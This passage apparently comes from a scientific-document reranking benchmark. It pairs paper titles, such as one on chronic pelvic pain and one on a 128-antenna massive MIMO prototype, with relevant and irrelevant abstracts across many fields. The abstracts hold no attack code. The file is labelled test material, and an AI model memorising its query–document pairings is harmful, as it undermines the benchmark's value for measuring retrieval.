in einem Parr Reaktor hergestellt worden war, hatte durchschnittlich ein niedrigeres Molekülgewicht als LWPF-Harz, das in einem atmosphärischen Dreihals-Kolben hergestellt worden war. Die Infrarot-Spektren der LWPF-Harze ähnelten denjenigen von konventionellem Novolak Harz, unterschieden sich jedoch im 1800–1600 cm-1 Bereich deutlich. Diese Ergebnisse zeigen, dass das Phenol bei der Synthese von Novolak-Harz teilweise durch verflüssigtes Holz ersetzt werden kann. Verbundwerkstoffe mit LWPF-Harz, das aus verflüssigtem Holz im versiegelten Parr Reaktor hergestellt worden war, wiesen eine höhere Dickenquellung auf als diejenigen mit LWPF-Harz, das im Dreihals-Kolben hergestellt worden war. Der Grund besteht wahrscheinlich in den im Vergleich zu LWPF-Harz aus dem Dreihals-Kolben eingebundenen hydrophilen Holzbestandteilen und der niedrigeren Vernetzungsdichte während der Aushärtung.",
"title": ""
}
] | scidocsrr |
adf6761365ce8f3912cb16ab6b490f61 | Relating Chronic Pelvic Pain and Endometriosis to Signs of Sensitization and Myofascial Pain and Dysfunction. | [
{
"docid": "fe30cb6b1643be8362c16743e0c7f70b",
"text": "The peripheral nervous and immune systems are traditionally thought of as serving separate functions. The line between them is, however, becoming increasingly blurred by new insights into neurogenic inflammation. Nociceptor neurons possess many of the same molecular recognition pathways for danger as immune cells, and, in response to danger, the peripheral nervous system directly communicates with the immune system, forming an integrated protective mechanism. The dense innervation network of sensory and autonomic fibers in peripheral tissues and high speed of neural transduction allows rapid local and systemic neurogenic modulation of immunity. Peripheral neurons also seem to contribute to immune dysfunction in autoimmune and allergic diseases. Therefore, understanding the coordinated interaction of peripheral neurons with immune cells may advance therapeutic approaches to increase host defense and suppress immunopathology.",
"title": ""
}
] | [
{
"docid": "cbfd6bf45521082645664d68f366246e",
"text": "Novel and compact composite right/left-handed (CRLH) quarter-wave type resonators are proposed in this paper. The resonator can resonate at the frequency where the electrical length is phase-leading or negative, which results in a smaller size as compared to the conventional phase-delayed microstrip-line resonator. Furthermore, it is only half the size of the CRLH half-wave resonator resonating at the same frequency. In addition, the proposed resonator is capable of engineering the multiresonances very close to each other, which makes it suitable to implement the miniaturized multiband microwave components such as diplexers and triplexers. A very compact diplexer and a very compact triplexer are proposed based on the proposed CRLH quarter-wave resonators in this paper and both of them have demonstrated very good performance. Specifically, compared to the referenced works based on the conventional microstrip resonators, the proposed diplexer and triplexer are 50% and 76% smaller than their microstrip counterparts, respectively.",
"title": ""
},
{
"docid": "2bba03660a752f7033e8ecd95eb6bdbd",
"text": "Crowdsensing has the potential to support human-driven sensing and data collection at an unprecedented scale. While many organizers of data collection campaigns may have extensive domain knowledge, they do not necessarily have the skills required to develop robust software for crowdsensing. In this paper, we present Mobile Campaign Designer, a tool that simplifies the creation of mobile crowdsensing applications. Using Mobile Campaign Designer, an organizer is able to define parameters about their crowdsensing campaign, and the tool generates the source code and an executable for a tailored mobile application that embodies the current best practices in crowdsensing. An evaluation of the tool shows that users at all levels of technical expertise are capable of creating a crowdsensing application in an average of five minutes, and the generated applications are comparable in quality to existing crowdsensing applications.",
"title": ""
},
{
"docid": "0a81730588c23c4ed153dab18791bdc2",
"text": "Deep neural networks (DNNs) have shown an inherent vulnerability to adversarial examples which are maliciously crafted on real examples by attackers, aiming at making target DNNs misbehave. The threats of adversarial examples are widely existed in image, voice, speech, and text recognition and classification. Inspired by the previous work, researches on adversarial attacks and defenses in text domain develop rapidly. In order to make people have a general understanding about the field, this article presents a comprehensive review on adversarial examples in text, including attack and defense approaches. We analyze the advantages and shortcomings of recent adversarial examples generation methods and elaborate the efficiency and limitations on the countermeasures. Finally, we discuss the challenges in adversarial texts and provide a research direction of this aspect.",
"title": ""
},
{
"docid": "b3a3dfdc32f9751fabdd6fd06fc598ca",
"text": "L-LDA is a new supervised topic model for assigning \"topics\" to a collection of documents (e.g., Twitter profiles). User studies have shown that L-LDA effectively performs a variety of tasks in Twitter that include not only assigning topics to profiles, but also re-ranking feeds, and suggesting new users to follow. Building upon these promising qualitative results, we here run an extensive quantitative evaluation of L-LDA. We test the extent to which, compared to the competitive baseline of Support Vector Machines (SVM), L-LDA is effective at two tasks: 1) assigning the correct topics to profiles; and 2) measuring the similarity of a profile pair. We find that L-LDA generally performs as well as SVM, and it clearly outperforms SVM when training data is limited, making it an ideal classification technique for infrequent topics and for (short) profiles of moderately active users. We have also built a web application that uses L-LDA to classify any given profile and graphically map predominant topics in specific geographic regions.",
"title": ""
},
{
"docid": "58ab2a362bb9864c09853ca03101c6df",
"text": "Answering reachability queries on directed graphs is ubiquitous in many applications involved with graph-shaped data as one of the most fundamental and important operations. However, it is still highly challenging to efficiently process them on large-scale graphs. Transitive-closure-based methods consume prohibitively large index space, and online-search-based methods answer queries too slowly. Labeling-based methods attain both small index size and query time, but previous indexing algorithms are not scalable at all for processing large graphs of the day. In this paper, we propose new labeling-based methods for reachability queries, referred to as pruned landmark labeling and pruned path labeling. They follow the frameworks of 2-hop cover and 3-hop cover, but their indexing algorithms are based on the recent notion of pruned labeling and improve the indexing time by several orders of magnitude, resulting in applicability to large graphs with tens of millions of vertices and edges. Our experimental results show that they attain remarkable trade-offs between fast query time, small index size and scalability, which previous methods have never been able to achieve. Furthermore, we also discuss the ingredients of the efficiency of our methods by a novel theoretical analysis based on the graph minor theory.",
"title": ""
},
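The labeling approach in the preceding passage answers reach(u, w) by intersecting a small out-label of u with an in-label of w, and keeps those labels small by pruning entries that earlier landmarks already cover. The sketch below shows this 2-hop pruned-BFS idea for directed reachability; the vertex ordering, data structures, and function names are assumptions rather than the authors' implementation.

```python
from collections import deque

def build_pruned_labels(n, adj, radj, order):
    """adj/radj: forward and reverse adjacency lists; order: landmark vertices, best first."""
    L_in = [set() for _ in range(n)]   # landmarks that can reach u
    L_out = [set() for _ in range(n)]  # landmarks reachable from u

    def reachable(u, w):
        return u == w or bool(L_out[u] & L_in[w])

    for v in order:
        # Forward pruned BFS: every vertex u reached from v gets v in L_in[u],
        # unless an earlier landmark already certifies reach(v, u).
        queue, seen = deque([v]), {v}
        while queue:
            u = queue.popleft()
            if u != v and reachable(v, u):
                continue                      # pruned: pair already covered
            L_in[u].add(v)
            for w in adj[u]:
                if w not in seen:
                    seen.add(w)
                    queue.append(w)
        # Backward pruned BFS: every vertex that reaches v gets v in its L_out.
        queue, seen = deque([v]), {v}
        while queue:
            u = queue.popleft()
            if u != v and reachable(u, v):
                continue
            L_out[u].add(v)
            for w in radj[u]:
                if w not in seen:
                    seen.add(w)
                    queue.append(w)
    return L_in, L_out, reachable

# Tiny example: edges 0 -> 1 -> 2, vertex 3 isolated
adj = [[1], [2], [], []]
radj = [[], [0], [1], []]
L_in, L_out, reachable = build_pruned_labels(4, adj, radj, order=[1, 0, 2, 3])
print(reachable(0, 2), reachable(2, 0))  # True False
```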
{
"docid": "b80b62e793a200116e52496af7dd4d8b",
"text": "In the great expansion of the social networking activity, young people are the main users whose choices have vast influence. This study uses the flow theory to gauge the impact of Facebook usage on Tunisian students' achievements, with the presumption that the high usage level might reduce students' scholar achievements. The research design suggests that this impact would vary among students with different interests for the university and multitasking capabilities. Facebook usage would develop students' satisfaction with friends and family, which could enhance their academic performance. Analyses from 161 Tunisian students show that Facebook usage does not affect significantly students' academic performance and their satisfaction with the family, whereas it decreases their actual satisfaction with friends. Yet, a high level of satisfaction of the student with his family continues to enhance his academic performance. Overall, though, Facebook usage appears to do not have a significant effect on undergraduate students' academic performance. However, this interdependency is significantly moderated by the student's interest for the university and his multitasking capabilities. Students with multitasking skills and students with initial interest for the university might experience a positive effect of Facebook usage on their studies, as they keep control over their activity and make it a beneficial leisure activity. However, students who do not have these characteristics tend to not have any significant effect. Results help to understand the psychological attitude and consequent behavior of the youths on this platform. Implications, limitations, and further research directions are offered.",
"title": ""
},
{
"docid": "4480840e6dbab77e4f032268ea69bff1",
"text": "This chapter provides a critical survey of emergence definitions both from a conceptual and formal standpoint. The notions of downward / backward causation and weak / strong emergence are specially discussed, for application to complex social system with cognitive agents. Particular attention is devoted to the formal definitions introduced by (Müller 2004) and (Bonabeau & Dessalles, 1997), which are operative in multi-agent frameworks and make sense from both cognitive and social point of view. A diagrammatic 4-Quadrant approach, allow us to understanding of complex phenomena along both interior/exterior and individual/collective dimension.",
"title": ""
},
{
"docid": "b7673dbe46a1118511d811241940e328",
"text": "A 100-MHz–2-GHz closed-loop analog in-phase/ quadrature correction circuit for digital clocks is presented. The proposed circuit consists of a phase-locked loop- type architecture for quadrature error correction. The circuit corrects the phase error to within a 1.5° up to 1 GHz and to within 3° at 2 GHz. It consumes 5.4 mA from a 1.2 V supply at 2 GHz. The circuit was designed in UMC 0.13-<inline-formula> <tex-math notation=\"LaTeX\">$\\mu \\text{m}$ </tex-math></inline-formula> mixed-mode CMOS with an active area of <inline-formula> <tex-math notation=\"LaTeX\">$102\\,\\,\\mu {\\mathrm{ m}} \\times 95\\,\\,\\mu {\\mathrm{ m}}$ </tex-math></inline-formula>. The impact of duty cycle distortion has been analyzed. High-frequency quadrature measurement related issues have been discussed. The proposed circuit was used in two different applications for which the functionality has been verified.",
"title": ""
},
{
"docid": "075e263303b73ee5d1ed6cff026aee63",
"text": "Automatic and accurate whole-heart and great vessel segmentation from 3D cardiac magnetic resonance (MR) images plays an important role in the computer-assisted diagnosis and treatment of cardiovascular disease. However, this task is very challenging due to ambiguous cardiac borders and large anatomical variations among different subjects. In this paper, we propose a novel densely-connected volumetric convolutional neural network, referred as DenseVoxNet, to automatically segment the cardiac and vascular structures from 3D cardiac MR images. The DenseVoxNet adopts the 3D fully convolutional architecture for effective volume-to-volume prediction. From the learning perspective, our DenseVoxNet has three compelling advantages. First, it preserves the maximum information flow between layers by a densely-connected mechanism and hence eases the network training. Second, it avoids learning redundant feature maps by encouraging feature reuse and hence requires fewer parameters to achieve high performance, which is essential for medical applications with limited training data. Third, we add auxiliary side paths to strengthen the gradient propagation and stabilize the learning process. We demonstrate the effectiveness of DenseVoxNet by comparing it with the state-of-the-art approaches from HVSMR 2016 challenge in conjunction with MICCAI, and our network achieves the best dice coefficient. We also show that our network can achieve better performance than other 3D ConvNets but with fewer parameters.",
"title": ""
},
{
"docid": "0575f79872ffd036d48efa731bc451e1",
"text": "When learning a new concept, not all training examples may prove equally useful for training: some may have higher or lower training value than others. The goal of this paper is to bring to the attention of the vision community the following considerations: (1) some examples are better than others for training detectors or classifiers, and (2) in the presence of better examples, some examples may negatively impact performance and removing them may be beneficial. In this paper, we propose an approach for measuring the training value of an example, and use it for ranking and greedily sorting examples. We test our methods on different vision tasks, models, datasets and classifiers. Our experiments show that the performance of current state-of-the-art detectors and classifiers can be improved when training on a subset, rather than the whole training set.",
"title": ""
},
{
"docid": "0c45c5ee2433578fbc29d29820042abe",
"text": "When Andrew John Wiles was 10 years old, he read Eric Temple Bell’s The Last Problem and was so impressed by it that he decided that he would be the first person to prove Fermat’s Last Theorem. This theorem states that there are no nonzero integers a, b, c, n with n > 2 such that an + bn = cn. This object of this paper is to prove that all semistable elliptic curves over the set of rational numbers are modular. Fermat’s Last Theorem follows as a corollary by virtue of work by Frey, Serre and Ribet.",
"title": ""
},
{
"docid": "209ee5fc48584ce98c7dcad664be11ac",
"text": "A traffic surveillance system includes detection of vehicles which involves the detection and identification of license plate numbers. This paper proposes an intelligent approach of detecting vehicular number plates automatically using three efficient algorithms namely Ant colony optimization (ACO) used in plate localization for identifying the edges, a character segmentation and extraction algorithm and a hierarchical combined classification method based on inductive learning and SVM for individual character recognition. Initially the performance of the Ant Colony Optimization algorithm is compared with the existing algorithms for edge detection namely Canny, Prewitt, Roberts, Mexican Hat and Sobel operators. The Ant Colony Optimization used in communication systems has certain limitations when used in edge detection like random initial ant position in the image and the heuristic information being highly dictated by transition probabilities. In this paper, modifications like assigning a well-defined initial ant position and making use of weights to calculate heuristic value which will provide additional information about transition probabilities are used to overcome the limitations. Further a character extraction and segmentation algorithm which uses the concept of Kohonen neural network to identify the position and dimensions of characters is presented along with a comparison with the existing Histogram and Connected Pixels approach. Finally an inductive learning based classification method is compared with the Support Vector Machine based classification method and a combined classification method which uses both inductive learning and Support Vector Machine based approach for character recognition is proposed. The proposed character recognition algorithm may be more efficient than the other two.",
"title": ""
},
{
"docid": "4a1db0cab3812817c3ebb149bd8b3021",
"text": "Structural information in web text provides natural annotations for NLP problems such as word segmentation and parsing. In this paper we propose a discriminative learning algorithm to take advantage of the linguistic knowledge in large amounts of natural annotations on the Internet. It utilizes the Internet as an external corpus with massive (although slight and sparse) natural annotations, and enables a classifier to evolve on the large-scaled and real-time updated web text. With Chinese word segmentation as a case study, experiments show that the segmenter enhanced with the Chinese wikipedia achieves significant improvement on a series of testing sets from different domains, even with a single classifier and local features.",
"title": ""
},
{
"docid": "522cf7baa14071f2196263ccd061fdc2",
"text": "To understand and identify the attack surfaces of a Cyber-Physical System (CPS) is an essential step towards ensuring its security. The growing complexity of the cybernetics and the interaction of independent domains such as avionics, robotics and automotive is a major hindrance against a holistic view CPS. Furthermore, proliferation of communication networks have extended the reach of CPS from a user-centric single platform to a widely distributed network, often connecting to critical infrastructure, e.g., through smart energy initiative. In this manuscript, we reflect on this perspective and provide a review of current security trends and tools for secure CPS. We emphasize on both the design and execution flows and particularly highlight the necessity of efficient attack surface detection. We provide a detailed characterization of attacks reported on different cyber-physical systems, grouped according to their application domains, attack complexity, attack source and impact. Finally, we review the current tools, point out their inadequacies and present a roadmap of future research.",
"title": ""
},
{
"docid": "8c28ec4f3dd42dc9d53fed2e930f7a77",
"text": "If a theory of concept composition aspires to psychological plausibility, it may first need to address several preliminary issues associated with naturally occurring human concepts: content variability, multiple representational forms, and pragmatic constraints. Not only do these issues constitute a significant challenge for explaining individual concepts, they pose an even more formidable challenge for explaining concept compositions. How do concepts combine as their content changes, as different representational forms become active, and as pragmatic constraints shape processing? Arguably, concepts are most ubiquitous and important in compositions, relative to when they occur in isolation. Furthermore, entering into compositions may play central roles in producing the changes in content, form, and pragmatic relevance observed for individual concepts. Developing a theory of concept composition that embraces and illuminates these issues would not only constitute a significant contribution to the study of concepts, it would provide insight into the nature of human cognition. The human ability to construct and combine concepts is prolific. On the one hand, people acquire tens of thousands of concepts for diverse categories of settings, agents, objects, actions, mental states, bodily states, properties, relations, and so forth. On the other, people combine these concepts to construct infinite numbers of more complex concepts, as the open-ended phrases, sentences, and texts that humans produce effortlessly and ubiquitously illustrate. Major changes in the brain, the emergence of language, and new capacities for social cognition all probably played central roles in the evolution of these impressive conceptual abilities (e.g., Deacon 1997; Donald 1993; Tomasello 2009). In psychology alone, much research addresses human concepts (e.g., Barsalou 2012;Murphy 2002; Smith andMedin 1981) and concept composition (often referred to as conceptual combination; e.g., Costello and Keane 2000; Gagné and Spalding 2014; Hampton 1997; Hampton and Jönsson 2012;Medin and Shoben 1988;Murphy L.W. Barsalou (✉) Institute of Neuroscience and Psychology, University of Glasgow, Glasgow, Scotland e-mail: lawrence.barsalou@glasgow.ac.uk © The Author(s) 2017 J.A. Hampton and Y. Winter (eds.), Compositionality and Concepts in Linguistics and Psychology, Language, Cognition, and Mind 3, DOI 10.1007/978-3-319-45977-6_2 9 1988;Wisniewski 1997;Wu andBarsalou 2009).More generally across the cognitive sciences, much additional research addresses concepts and the broader construct of compositionality (for a recent collection, see Werning et al. 2012). 1 Background Framework A grounded approach to concepts. Here I assume that a concept is a dynamical distributed network in the brain coupled with a category in the environment or experience, with this network guiding situated interactions with the category’s instances (for further detail, see Barsalou 2003b, 2009, 2012, 2016a, 2016b). The concept of bicycle, for example, represents and guides interactions with the category of bicycles in the world. Across interactions with a category’s instances, a concept develops in memory by aggregating information from perception, action, and internal states. Thus, the concept of bicycle develops from aggregating multimodal information related to bicycles across the situations in which they are experienced. 
As a consequence of using selective attention to extract information relevant to the concept of bicycle from the current situation (e.g., a perceived bicycle), and then using integration mechanisms to integrate it with other bicycle information already in memory, aggregate information for the category develops continually (Barsalou 1999). As described later, however, background situational knowledge is also captured that plays important roles in conceptual processing (Barsalou 2016b, 2003b; Yeh and Barsalou 2006). Although learning plays central roles in establishing concepts, genetic and epigenetic processes constrain the features that can be represented for a concept, and also their integration in the brain’s association areas (e.g., Simmons and Barsalou 2003). For example, biologically-based neural circuits may anticipate the conceptual structure of evolutionarily important concepts, such as agents, minds, animals, foods, and tools. Once the conceptual system is in place, it supports virtually all other forms of cognitive activity, both online in the current situation and offline when representing the world in language, memory, and thought (e.g., Barsalou 2012, 2016a, 2016b). From the perspective developed here, when conceptual knowledge is needed for a task, concepts produce situation-specific simulations of the relevant category dynamically, where a simulation attempts to reenact the kind of neural and bodily states associated with processing the category. On needing conceptual knowledge about bicycles, for example, a small subset of the distributed bicycle network in the brain becomes active to simulate what it would be like to interact with an actual bicycle. This multimodal simulation provides anticipatory inferences about what is likely to be perceived further for the bicycle in the current situation, how to interact with it effectively, and what sorts of internal states might result (Barsalou 2009). The specific bicycle simulation that becomes active is one of infinitely many simulations that could be constructed dynamically from the bicycle network—the entire network never becomes fully active. Typically, simulations remain unconscious, at least to a large extent, while causally influencing cognition, affect, and 10 L.W. Barsalou",
"title": ""
},
{
"docid": "72bb768adc44f6b9c5c6ac08161c93c2",
"text": "A central challenge to using first-order methods for optimizing nonconvex problems is the presence of saddle points. First-order methods often get stuck at saddle points, greatly deteriorating their performance. Typically, to escape from saddles one has to use secondorder methods. However, most works on second-order methods rely extensively on expensive Hessian-based computations, making them impractical in large-scale settings. To tackle this challenge, we introduce a generic framework that minimizes Hessianbased computations while at the same time provably converging to secondorder critical points. Our framework carefully alternates between a first-order and a second-order subroutine, using the latter only close to saddle points, and yields convergence results competitive to the state-of-the-art. Empirical results suggest that our strategy also enjoys a good practical performance.",
"title": ""
},
{
"docid": "ec392d39f47286c7fc5788e10c3d5481",
"text": "A robust skin detector is the primary need of many fields of computer vision, including face detection, gesture recognition, and pornography filtering. Less than 10 years ago, the first paper on automatic pornography filtering was published. Since then, different researchers claim different color spaces to be the best choice for skin detection in pornography filtering. Unfortunately, no comprehensive work is performed on evaluating different color spaces and their performance for detecting naked persons. As such, researchers usualy refer to the results of skin detection based on the work doen for face detection, which underlies different imaging conditions. In this paper, we examine 21 color spaces in all their possible representations for pixel-based skin detection in pornographic images. Consequently, this paper holds a large investigation in the field of skin detection, and a specific run on the pornographic images.",
"title": ""
},
{
"docid": "2b97e03fa089cdee0bf504dd85e5e4bb",
"text": "One of the most severe threats to revenue and quality of service in telecom providers is fraud. The advent of new technologies has provided fraudsters new techniques to commit fraud. SIM box fraud is one of such fraud that has emerged with the use of VOIP technologies. In this work, a total of nine features found to be useful in identifying SIM box fraud subscriber are derived from the attributes of the Customer Database Record (CDR). Artificial Neural Networks (ANN) has shown promising solutions in classification problems due to their generalization capabilities. Therefore, supervised learning method was applied using Multi layer perceptron (MLP) as a classifier. Dataset obtained from real mobile communication company was used for the experiments. ANN had shown classification accuracy of 98.71 %.",
"title": ""
},
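The preceding passage describes training a supervised multilayer perceptron on nine CDR-derived features to flag SIM box fraud subscribers. A minimal scikit-learn sketch of such a setup is shown below; the synthetic feature matrix, labels, and network size are placeholders, not the authors' data or configuration.

```python
import numpy as np
from sklearn.model_selection import train_test_split
from sklearn.neural_network import MLPClassifier
from sklearn.pipeline import make_pipeline
from sklearn.preprocessing import StandardScaler

# X: one row per subscriber with 9 features derived from CDR attributes
# y: 1 = SIM box fraud subscriber, 0 = legitimate subscriber (placeholder data)
rng = np.random.default_rng(0)
X = rng.normal(size=(1000, 9))
y = (X[:, 0] + X[:, 3] > 1).astype(int)

X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=0)

model = make_pipeline(
    StandardScaler(),                                   # scale features before the MLP
    MLPClassifier(hidden_layer_sizes=(16,), max_iter=500, random_state=0),
)
model.fit(X_train, y_train)
print("accuracy:", model.score(X_test, y_test))
```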
{
"docid": "23737f898d9b50ff7741096a59054759",
"text": "We present a new method for speech denoising and robust speech recognition. Using the framework of probabilistic models allows us to integrate detailed speech models and models of realistic non-stationary noise signals in a principled manner. The framework transforms the denoising problem into a problem of Bayes-optimal signal estimation, producing minimum mean square error estimators of desired features of clean speech from noisy data. We describe a fast and efficient implementation of an algorithm that computes these estimators. The effectiveness of this algorithm is demonstrated in robust speech recognition experiments, using the Wall Street Journal speech corpus and Microsoft Whisper large-vocabulary continuous speech recognizer. Results show significantly lower word error rates than those under noisy-matched condition. In particular, when the denoising algorithm is applied to the noisy training data and subsequently the recognizer is retrained, very low error rates are obtained.",
"title": ""
},
{
"docid": "c0551510c63a42682abc4ea008f81683",
"text": "Deep generative models have recently yielded encouraging results in producing subjectively realistic samples of complex data. Far less attention has been paid to making these generative models interpretable. In many scenarios, ranging from scientific applications to finance, the observed variables have a natural grouping. It is often of interest to understand systems of interaction amongst these groups, and latent factor models (LFMs) are an attractive approach. However, traditional LFMs are limited by assuming a linear correlation structure. We present an output interpretable VAE (oi-VAE) for grouped data that models complex, nonlinear latent-to-observed relationships. We combine a structured VAE comprised of group-specific generators with a sparsity-inducing prior. We demonstrate that oi-VAE yields meaningful notions of interpretability in the analysis of motion capture and MEG data. We further show that in these situations, the regularization inherent to oi-VAE can actually lead to improved generalization and learned generative processes.",
"title": ""
}
] | scidocsrr |
9f1b5676a0bd25fb31ca2db199fb5516 | Design and implementation of a tdd-based 128-antenna massive MIMO prototype system | [
{
"docid": "3e111f220be59d347d6acd9d73b2c653",
"text": "This paper considers a multiple-input multiple-output (MIMO) receiver with very low-precision analog-to-digital convertors (ADCs) with the goal of developing massive MIMO antenna systems that require minimal cost and power. Previous studies demonstrated that the training duration should be relatively long to obtain acceptable channel state information. To address this requirement, we adopt a joint channel-and-data (JCD) estimation method based on Bayes-optimal inference. This method yields minimal mean square errors with respect to the channels and payload data. We develop a Bayes-optimal JCD estimator using a recent technique based on approximate message passing. We then present an analytical framework to study the theoretical performance of the estimator in the large-system limit. Simulation results confirm our analytical results, which allow the efficient evaluation of the performance of quantized massive MIMO systems and provide insights into effective system design.",
"title": ""
}
] | [
{
"docid": "de5e6be7d21bd93cbc042c40c9bf6ef4",
"text": "We present STRUCTURE HARVESTER (available at http://taylor0.biology.ucla.edu/structureHarvester/ ), a web-based program for collating results generated by the program STRUCTURE. The program provides a fast way to assess and visualize likelihood values across multiple values of K and hundreds of iterations for easier detection of the number of genetic groups that best fit the data. In addition, STRUCTURE HARVESTER will reformat data for use in downstream programs, such as CLUMPP.",
"title": ""
},
{
"docid": "eb286d4a7406dc235820ccb848844840",
"text": "This paper describes the design and testing of a new introductory programming language, GRAIL1. GRAIL was designed to minimise student syntax errors, and hence allow the study of the impact of syntax errors on learning to program. An experiment was conducted using students learning programming for the first time. The students were split into two groups, one group learning LOGO and the other GRAIL. The resulting code was then analysed for syntax and logic errors. The groups using LOGO made more errors than the groups using GRAIL, which shows that choice of programming language can have a substantial impact on error rates of novice programmers.",
"title": ""
},
{
"docid": "6eaa0d1b6a7e55eca070381954638292",
"text": "Unsupervised learning is of growing interest because it unlocks the potential held in vast amounts of unlabeled data to learn useful representations for inference. Autoencoders, a form of generative model, may be trained by learning to reconstruct unlabeled input data from a latent representation space. More robust representations may be produced by an autoencoder if it learns to recover clean input samples from corrupted ones. Representations may be further improved by introducing regularization during training to shape the distribution of the encoded data in the latent space. We suggest denoising adversarial autoencoders (AAEs), which combine denoising and regularization, shaping the distribution of latent space using adversarial training. We introduce a novel analysis that shows how denoising may be incorporated into the training and sampling of AAEs. Experiments are performed to assess the contributions that denoising makes to the learning of representations for classification and sample synthesis. Our results suggest that autoencoders trained using a denoising criterion achieve higher classification performance and can synthesize samples that are more consistent with the input data than those trained without a corruption process.",
"title": ""
},
{
"docid": "c35306b0ec722364308d332664c823f8",
"text": "The uniform asymmetrical microstrip parallel coupled line is used to design the multi-section unequal Wilkinson power divider with high dividing ratio. The main objective of the paper is to increase the trace widths in order to facilitate the construction of the power divider with the conventional photolithography method. The separated microstrip lines in the conventional Wilkinson power divider are replaced with the uniform asymmetrical parallel coupled lines. An even-odd mode analysis is used to calculate characteristic impedances and then the per-unit-length capacitance and inductance parameter matrix are used to calculate the physical dimension of the power divider. To clarify the advantages of this method, two three-section Wilkinson power divider with an unequal power-division ratio of 1 : 2.5 are designed and fabricated and measured, one in the proposed configuration and the other in the conventional configuration. The simulation and the measurement results show that not only the specified design goals are achieved, but also all the microstrip traces can be easily implemented in the proposed power divider.",
"title": ""
},
{
"docid": "46f95796996d4638afcc7b703a1f3805",
"text": "One of the main challenges in Grid systems is designing an adaptive, scalable, and model-independent method for job scheduling to achieve a desirable degree of load balancing and system efficiency. Centralized job scheduling methods have some drawbacks, such as single point of failure and lack of scalability. Moreover, decentralized methods require a coordination mechanism with limited communications. In this paper, we propose a multi-agent approach to job scheduling in Grid, named Centralized Learning Distributed Scheduling (CLDS), by utilizing the reinforcement learning framework. The CLDS is a model free approach that uses the information of jobs and their completion time to estimate the efficiency of resources. In this method, there are a learner agent and several scheduler agents that perform the task of learning and job scheduling with the use of a coordination strategy that maintains the communication cost at a limited level. We evaluated the efficiency of the CLDS method by designing and performing a set of experiments on a simulated Grid system under different system scales and loads. The results show that the CLDS can effectively balance the load of system even in large scale and heavy loaded Grids, while maintains its adaptive performance and scalability.",
"title": ""
},
{
"docid": "d7793313ab21020e79e41817b8372ee8",
"text": "We present a new approach to referring expression generation, casting it as a density estimation problem where the goal is to learn distributions over logical expressions identifying sets of objects in the world. Despite an extremely large space of possible expressions, we demonstrate effective learning of a globally normalized log-linear distribution. This learning is enabled by a new, multi-stage approximate inference technique that uses a pruning model to construct only the most likely logical forms. We train and evaluate the approach on a new corpus of references to sets of visual objects. Experiments show the approach is able to learn accurate models, which generate over 87% of the expressions people used. Additionally, on the previously studied special case of single object reference, we show a 35% relative error reduction over previous state of the art.",
"title": ""
},
{
"docid": "b7b1153067a784a681f2c6d0105acb2a",
"text": "Investigations of the human connectome have elucidated core features of adult structural networks, particularly the crucial role of hub-regions. However, little is known regarding network organisation of the healthy elderly connectome, a crucial prelude to the systematic study of neurodegenerative disorders. Here, whole-brain probabilistic tractography was performed on high-angular diffusion-weighted images acquired from 115 healthy elderly subjects (age 76-94 years; 65 females). Structural networks were reconstructed between 512 cortical and subcortical brain regions. We sought to investigate the architectural features of hub-regions, as well as left-right asymmetries, and sexual dimorphisms. We observed that the topology of hub-regions is consistent with a young adult population, and previously published adult connectomic data. More importantly, the architectural features of hub connections reflect their ongoing vital role in network communication. We also found substantial sexual dimorphisms, with females exhibiting stronger inter-hemispheric connections between cingulate and prefrontal cortices. Lastly, we demonstrate intriguing left-lateralized subnetworks consistent with the neural circuitry specialised for language and executive functions, whilst rightward subnetworks were dominant in visual and visuospatial streams. These findings provide insights into healthy brain ageing and provide a benchmark for the study of neurodegenerative disorders such as Alzheimer's disease (AD) and frontotemporal dementia (FTD).",
"title": ""
},
{
"docid": "e2d1f265ab2a93ed852069288b90bcc4",
"text": "This paper presents a novel multi-view dense point cloud generation algorithm based on low-altitude remote sensing images. The proposed method was designed to be especially effective in enhancing the density of point clouds generated by Multi-View Stereo (MVS) algorithms. To overcome the limitations of MVS and dense matching algorithms, an expanded patch was set up for each point in the point cloud. Then, a patch-based Multiphoto Geometrically Constrained Matching (MPGC) was employed to optimize points on the patch based on least square adjustment, the space geometry relationship, and epipolar line constraint. The major advantages of this approach are twofold: (1) compared with the MVS method, the proposed algorithm can achieve denser three-dimensional (3D) point cloud data; and (2) compared with the epipolar-based dense matching method, the proposed method utilizes redundant measurements to weaken the influence of occlusion and noise on matching results. Comparison studies and experimental results have validated the accuracy of the proposed algorithm in low-altitude remote sensing image dense point cloud generation.",
"title": ""
},
{
"docid": "f1efe8868f19ccbb4cf2ab5c08961cdb",
"text": "High peak-to-average power ratio (PAPR) has been one of the major drawbacks of orthogonal frequency division multiplexing (OFDM) systems. In this letter, we propose a novel PAPR reduction scheme, known as PAPR reducing network (PRNet), based on the autoencoder architecture of deep learning. In the PRNet, the constellation mapping and demapping of symbols on each subcarrier is determined adaptively through a deep learning technique, such that both the bit error rate (BER) and the PAPR of the OFDM system are jointly minimized. We used simulations to show that the proposed scheme outperforms conventional schemes in terms of BER and PAPR.",
"title": ""
},
{
"docid": "dd45eef2b028866faa7d7d133077059a",
"text": "In the past 15 years, multiple articles have appeared that target fascia as an important component of treatment in the field of physical medicine and rehabilitation. To better understand the possible actions of fascial treatments, there is a need to clarify the definition of fascia and how it interacts with various other structures: muscles, nerves, vessels, organs. Fascia is a tissue that occurs throughout the body. However, different kinds of fascia exist. In this narrative review, we demonstrate that symptoms related to dysfunction of the lymphatic system, superficial vein system, and thermoregulation are closely related to dysfunction involving superficial fascia. Dysfunction involving alterations in mechanical coordination, proprioception, balance, myofascial pain, and cramps are more related to deep fascia and the epimysium. Superficial fascia is obviously more superficial than the other types and contains more elastic tissue. Consequently, effective treatment can probably be achieved with light massage or with treatment modalities that use large surfaces that spread the friction in the first layers of the subcutis. The deep fasciae and the epymisium require treatment that generates enough pressure to reach the surface of muscles. For this reason, the use of small surface tools and manual deep friction with the knuckles or elbows are indicated. Due to different anatomical locations and to the qualities of the fascial tissue, it is important to recognize that different modalities of approach have to be taken into consideration when considering treatment options.",
"title": ""
},
{
"docid": "4b84582e69cd8393ba4dfefb073bf74e",
